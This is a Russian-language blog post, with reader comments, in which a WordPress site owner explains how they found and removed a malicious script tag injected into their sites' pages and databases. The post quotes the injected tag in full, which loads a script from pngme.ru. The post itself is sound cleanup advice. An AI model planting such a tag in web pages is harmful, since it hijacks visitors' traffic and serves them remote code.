Ваш IP: 54.92.197.82

Главная » Вредоносный код на страницах сайта

Вредоносный код на страницах сайта

Вредоносный код может появиться на страницах Вашего сайта в результате его взлома. Не буду описывать все возможные варианты таких кодов и их расположение. В своей практике я только один раз столкнулся с такой проблемой, которая решилась довольно быстро.

Редактируя страницы на одном сайте, я обнаружил в html-редакторе очень странный небольшой скрипт:

<script src="//pngme.ru/seter"></script>

Такой скрипт обнаружил на всех страницах и тем более на всех остальных сайтах. Вопрос - откуда он взялся? Если бы он располагался на одном сайте, то и вопросов бы было меньше. Кроме обновления WordPress на всех сайтах я ничего больше не делал. Первая мыль была о том, что возможно WordPress ввёл какое-то новшество.

Погуглил эту тему в интернете и почти не нашел ответа на этот вопрос. Один только более вразумительный ответ за этот скрипт нашел на одном форуме. Там было написано, что "доброжелатели" установили эти скрипты для "угона мобильного трафика". Я не силён в хакерстве, но думаю, что всё было сделано примерно через проникновение в базу данных. Написал хостеру про этот скрипт, но толком не объяснили, только написали, что при проверке на сайте ничего подозрительного и вредоносного не обнаружилось.

Периодически редактируя страницы, я удалял этот скрипт где он встречался. Проблема обострилась, когда от Гугла стали приходить письма с предупреждением, что сайт был взломан и на его страницах находится вредоносный контент. И вот тогда работа закипела.

Первым делом надо было выяснить что это за вредоносный контент. В этом мне помог плагин WordPress Exploit Scanner. После сканирования он выдаёт кучу информации, как нужной так и не нужной, но все страницы где располагался этот скрипт он показал.

Первый сайт был небольшим, и я все эти скрипты удалил через админку сайта. С остальными было труднее, очень много страниц. Решение было простым. Я импортировал на компьютер по очереди базу данных каждого сайта. Открывал файл базы в редакторе Notepad++ и искал этот скрипт. Чтобы не удалять эти скрипты вручную, воспользуемся функцией "Замена" в редакторе. С помощью комбинации клавиш Ctrl + F вызываем поисковое окошко, и заполняем всё так как показано на скриншоте:

Вредоносный скрипт

Оставив поле "Заменить на:" пустым и нажав на кнопку "Заменить всё", произойдёт удаление всех вставленных скриптов. Не забудьте сохранить файл. Теперь необходимо зайти в phpMyAdmin. Там я полностью удалил все таблицы и по новому загрузил файл исправленной базы данных

Таким способом я очистил и остальные сайты. Думаю, что таким образом избавиться от вредоносных кодов не сложно. И самое главное, не забудьте сменить логин и пароли к базам данных!!!

Вредоносный код на страницах сайта обновлено: Апрель 10, 2017 автором: admin

4 комментария

  1. Хочу еще немного добавить. Я не сохранил вредоносный код, который присылал Яндекс. Но его можно найти самому, правда это долго будет. Придётся почти все файлы скриптов вскрывать и смотреть код. Вредоносный код у меня стоял во многих скриптах и особенно в скриптах плагинов. Код располагался в самом конце кода скрипта. Найти его можно таким способом….Я делал это на хостинге в редакторе. Открывается файл скрипта, к примеру какого-то плагина, и сравнивается с файлом оригинала. Можно поступить возможно проще — удалить все плагины и заново потом загрузить. Обязательно почистить базу. И нужно еще просмотреть скрипты в корневой папке, возможно он и там где-то сидит.

  2. Спасибо за совет.

    на страничках я искал в админке в каждой статье — нет
    а вот в базе этого кода много и активируется как то очень странно не постоянно а как будто по расписанию и притом указывает дату активации, ДА придется чистить базы на всех 3 сайтах, самое интересное как он туда попал, скорее всего с каким нибудь плагином.

    P.S. на проксе видно обращение к pngme.ru но заблокировать не возможно

  3. Андрей, тут небольшая проблема в поисковиках. Если они обнаружили, то должны хотя бы показать этот код.. и где его искать. В этом плане Яндекс мне очень помог…В вашем случае надо просто очистить базу данных….

  4. Здравствуйте

    у меня этот код почему то в базе данных , а на страничках нет

Оставить комментарий

Ваш email нигде не будет показанОбязательные для заполнения поля помечены *

*